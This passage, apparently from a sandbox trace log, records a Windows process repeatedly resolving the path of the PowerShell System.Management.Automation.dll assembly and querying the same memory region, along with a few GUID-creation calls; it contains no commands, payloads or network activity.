lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.637] CoCreateGuid (in: pguid=0xcd2f0 | out: 
pguid=0xcd2f0*(Data1=0x81d7f61e, Data2=0x4fb2, Data3=0x4f8e, Data4=([0]=0xbb, [1]=0xce, [2]=0xf5, [3]=0x67, [4]=0x24, [5]=0xec, [6]=0x8b, [7]=0x9d))) returned 0x0 [0135.638] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x63615c13, Data2=0x564c, Data3=0x4033, Data4=([0]=0xa6, [1]=0xc5, [2]=0xd5, [3]=0x9f, [4]=0x64, [5]=0x66, [6]=0xd, [7]=0xf3))) returned 0x0 [0135.638] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1b3e5715, Data2=0x956f, Data3=0x4eea, Data4=([0]=0x88, [1]=0xb7, [2]=0xa6, [3]=0x76, [4]=0x2f, [5]=0x89, [6]=0xf5, [7]=0x2e))) returned 0x0 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 
| out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x75b8cadf, Data2=0xc11e, Data3=0x4e3f, Data4=([0]=0xb7, [1]=0x83, [2]=0x42, [3]=0x7, [4]=0xc4, [5]=0x7f, [6]=0x87, [7]=0x42))) returned 0x0 [0135.640] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.643] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, 
AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: 
lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] CoCreateGuid (in: pguid=0xcd2f0 | out: 
pguid=0xcd2f0*(Data1=0x89b40a73, Data2=0xa12, Data3=0x4e94, Data4=([0]=0xb9, [1]=0xc6, [2]=0xdb, [3]=0xe5, [4]=0x36, [5]=0x53, [6]=0x17, [7]=0x16))) returned 0x0 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: 
lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba70, 
lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] 
CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x47ea6d06, Data2=0x741d, Data3=0x462f, Data4=([0]=0xa0, [1]=0x8f, [2]=0xb6, [3]=0xcf, [4]=0xeb, [5]=0xb5, [6]=0xc1, [7]=0x9c))) returned 0x0 [0135.650] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, 
lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: 